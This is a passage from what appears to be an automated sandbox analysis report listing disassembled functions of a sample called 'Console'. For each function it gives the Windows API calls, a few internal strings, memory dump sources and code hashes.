                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20e24c2e589398751ba277bb8e0b5685de5050079cec92580c73932bac94382f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BA1A1719102199FEB20CB64DC85FDAB7B9BF14700F4442EEEA09A7351D7709A98CF91
                                                                                                                                                                                                                          Function 012C6A20 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 252memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C6C5F
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C6CAC
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C6D62
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 012C6D84
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 3e40f3730876f3b4d0da5885d601d8699ef8e0e0dfedd664ba09128243214dfe
                                                                                                                                                                                                                          • Instruction ID: d28331e740a24dcdac0c2e982375e3d283567cbca8e3dd61fa0b3dad6e1e1590
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e40f3730876f3b4d0da5885d601d8699ef8e0e0dfedd664ba09128243214dfe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87A191719102199BDB20CB64DC85FDAB7B9FF14700F4442EEEA09A7351E7709A98CF91
                                                                                                                                                                                                                          Function 011AC530 Relevance: 7.7, APIs: 5, Instructions: 235COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?,7CAB6A82,?,?,?), ref: 011AC581
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?), ref: 011AC5E3
                                                                                                                                                                                                                            • Part of subcall function 00FFE830: EnterCriticalSection.KERNEL32(00000000,?,00000000,03C176F0,00000000,?,010E27AE,?,01229EF5), ref: 00FFE8B9
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000014), ref: 011AC82B
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?), ref: 011AC8B7
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?), ref: 011AC909
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$DeleteInitialize$EnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2187886827-0
                                                                                                                                                                                                                          • Opcode ID: 7d235a203c997b3053e561b66c16e1d32beb7a7c0731f91c09db10baddf7464c
                                                                                                                                                                                                                          • Instruction ID: db9c3a2396983c99d7441a2b20b8f598866b9ca48c8340b4c46a4d4410ae1ba1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d235a203c997b3053e561b66c16e1d32beb7a7c0731f91c09db10baddf7464c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02B17EB4900218CFDB24CF68C99479EBBB4BF00318F5441DDD649AB291D779AA88CF95
                                                                                                                                                                                                                          Function 010D64B0 Relevance: 7.7, APIs: 5, Instructions: 229memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,7CAB6A82,00000000,00000000,00000000,00000000,014B5A60,000000FF,?,011378B9,00000000,00000000,00000001,012D6A87,7CAB6A82,?), ref: 010D6623
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,00000000,00000000,00000000,00000000,014B5A60,000000FF,?,011378B9,00000000,00000000,00000001,012D6A87,7CAB6A82), ref: 010D66BB
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,00000000,00000000,00000000,00000000,014B5A60,000000FF,?,011378B9,00000000,00000000,00000001,012D6A87,7CAB6A82), ref: 010D66D6
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,00000000,00000000,00000000,00000000,014B5A60,000000FF,?,011378B9,00000000,00000000,00000001,012D6A87,7CAB6A82), ref: 010D66F1
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,00000000,00000000,00000000,00000000,014B5A60,000000FF,?,011378B9,00000000,00000000,00000001,012D6A87,7CAB6A82), ref: 010D672E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Free$Heap$Library
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 912051049-0
                                                                                                                                                                                                                          • Opcode ID: 62b7a394afcd73dce7a5e9ae5e1441344279706a5953cec2bfe286118a9f7bde
                                                                                                                                                                                                                          • Instruction ID: e4c2fd61d92f9b2725c3815e1506764e75861bc37bf6513dd12906ba78b21bb1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62b7a394afcd73dce7a5e9ae5e1441344279706a5953cec2bfe286118a9f7bde
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED915F747007119FEB28CF69D898B29BBE4FF08701F1541ADE9459B7A4CB76E860CB90
                                                                                                                                                                                                                          Function 012BF030 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 216memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0150E144,0150E144), ref: 012BF1A1
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0150E144,0150E144), ref: 012BF1DF
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0150E144,0150E144), ref: 012BF295
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0150E144,0150E144), ref: 012BF2B1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: 73e1d344ae95ae850a83ad0213be5611ac4fb355cc575e9de9c2b7d339660fb4
                                                                                                                                                                                                                          • Instruction ID: 11cb5291f58a87b65b4a357c47f663fdae51db800f9cb3eba47e8776592d94de
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73e1d344ae95ae850a83ad0213be5611ac4fb355cc575e9de9c2b7d339660fb4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0781E775D202199FDB30CBA8DD85BEEB7B8FF15340F14416AEA05AB241EB709944CF90
                                                                                                                                                                                                                          Function 012C80C0 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 216memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0150E144,0150E144), ref: 012C8231
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0150E144,0150E144), ref: 012C826F
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0150E144,0150E144), ref: 012C8325
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0150E144,0150E144), ref: 012C8341
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: NULL
                                                                                                                                                                                                                          • API String ID: 3298025750-324932091
                                                                                                                                                                                                                          • Opcode ID: aaade6c3bab4a238f0cc0a306c4a1c537579ce7d032d71f9f79b47d2aa14a65f
                                                                                                                                                                                                                          • Instruction ID: 4f7e27b7c3dbdafa483e4c35ca655be6db7a93dc829d15867e7583952b176ff5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaade6c3bab4a238f0cc0a306c4a1c537579ce7d032d71f9f79b47d2aa14a65f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E81F671D102199FDB21CBA8DC45BEEB7B8FF55700F14826EEA09AB251EB709944CF90
                                                                                                                                                                                                                          Function 012195C0 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 154memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00FCF0E0: HeapFree.KERNEL32(00000000,?,80131623,?,?,7CAB6A82,00000002), ref: 00FCF12B
                                                                                                                                                                                                                            • Part of subcall function 00FCF0E0: HeapFree.KERNEL32(00000000,?,80131623,?,?,7CAB6A82), ref: 00FCF197
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,0150E144,00000002,00000002,7CAB6A82), ref: 01219692
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,0150E144,00000002), ref: 012197C8
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,0150E144,000010FF,00000000,?,00000010,0164A1AC,0164A1AC,0164A1AC,0164A1AC,0164A1AC,0164A1AC,0164A1AC,0164A1AC,0164A1AC,0164A1AC), ref: 012197EB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: (%s)$0x%.8X
                                                                                                                                                                                                                          • API String ID: 3298025750-4175617291
                                                                                                                                                                                                                          • Opcode ID: 20dfbc49c9d03b78cc55f35c84a749bfb4fe753b60ef15c02386d685ee6cc6b5
                                                                                                                                                                                                                          • Instruction ID: ec638355114759e648226974b71a2c1025525ec8567b49b1f3d00a08a282bde8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20dfbc49c9d03b78cc55f35c84a749bfb4fe753b60ef15c02386d685ee6cc6b5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 415180B19102499BEF15CF94CA9ABEEBBF4FF14308F144518E950BB284D7795A48CBA0
                                                                                                                                                                                                                          Function 011B8B30 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 149memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 011B8BDB
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000), ref: 011B8C55
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • UnwindExInfo: PopExInfo(): popping nested ExInfo at 0x%p, xrefs: 011B8B70
                                                                                                                                                                                                                          • UnwindExInfo: clearing topmost ExInfo, xrefs: 011B8CD4
                                                                                                                                                                                                                          • UnwindExInfo: resetting nested ExInfo to 0x%p stackaddress:0x%p, xrefs: 011B8C99
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: UnwindExInfo: PopExInfo(): popping nested ExInfo at 0x%p$UnwindExInfo: clearing topmost ExInfo$UnwindExInfo: resetting nested ExInfo to 0x%p stackaddress:0x%p
                                                                                                                                                                                                                          • API String ID: 3298025750-1461742448
                                                                                                                                                                                                                          • Opcode ID: 213f2a8c18d944eee1d2001b8b02d8b0247f95eb711ba03b721beb5d898f0d40
                                                                                                                                                                                                                          • Instruction ID: 31e2e95561276c00225f99c178e1d5336f0081556360bedeb77ce4b845f5d69d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 213f2a8c18d944eee1d2001b8b02d8b0247f95eb711ba03b721beb5d898f0d40
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C51D3B1701300ABEB349F29DDD5BABBBA8EF54B01F14041CEE059B685E775E814CBA1
                                                                                                                                                                                                                          Function 010975E0 Relevance: 7.6, APIs: 5, Instructions: 144memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82), ref: 0109769C
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82), ref: 010976DA
                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNEL32(00000000,?,000000FF,00000000,00000200,00000000,00000000,7CAB6A82), ref: 01097711
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000), ref: 01097718
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 01097756
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$ByteCharConsoleMultiOutputWide
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1200818624-0
                                                                                                                                                                                                                          • Opcode ID: d3b9f510baaf300d2cfa93c75b8525c4615590c60c153e08d7b5a8a3c89a4d7f
                                                                                                                                                                                                                          • Instruction ID: 96584a0c7ef2b627684e56a3404737abee2039905894294dffafbeb2a500b9af
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3b9f510baaf300d2cfa93c75b8525c4615590c60c153e08d7b5a8a3c89a4d7f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8251CD75A40218EBEF209F68DC98BAEB7B4FB44710F9002D8E559A72D0C7785E40DF81
                                                                                                                                                                                                                          Function 012D8880 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 144memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,00000000,?,00000000), ref: 012D890B
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000018,?,00000000,?,00000000), ref: 012D8928
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,00000000,?,00000000), ref: 012D89D5
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000018,?,00000000,?,00000000), ref: 012D89F2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • ipc_stream_factory_build_and_add_port - Ignoring LISTEN port configuration, xrefs: 012D88B2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                          • String ID: ipc_stream_factory_build_and_add_port - Ignoring LISTEN port configuration
                                                                                                                                                                                                                          • API String ID: 1617791916-1770569030
                                                                                                                                                                                                                          • Opcode ID: 77f1a5f4a653415d622fa9e4dca29d98503f189db08f9ee4e8cd00e67774254f
                                                                                                                                                                                                                          • Instruction ID: c0cdb2cfe44b397235a79ce1debc61800c0e36bb6201743eca02e774ec044f31
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77f1a5f4a653415d622fa9e4dca29d98503f189db08f9ee4e8cd00e67774254f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A04123317203029BDB21DF2DD8807AAB7E5AF95311F048269EA89DF345EB70D881C792
                                                                                                                                                                                                                          Function 01135690 Relevance: 7.6, APIs: 5, Instructions: 136threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,011354C0,00000000,00000000,00000000), ref: 01135713
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 01135745
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 0113577B
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 011357E3
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000,7CAB6A82,00000000,?,00000000), ref: 01135801
                                                                                                                                                                                                                          Memory Dump Source
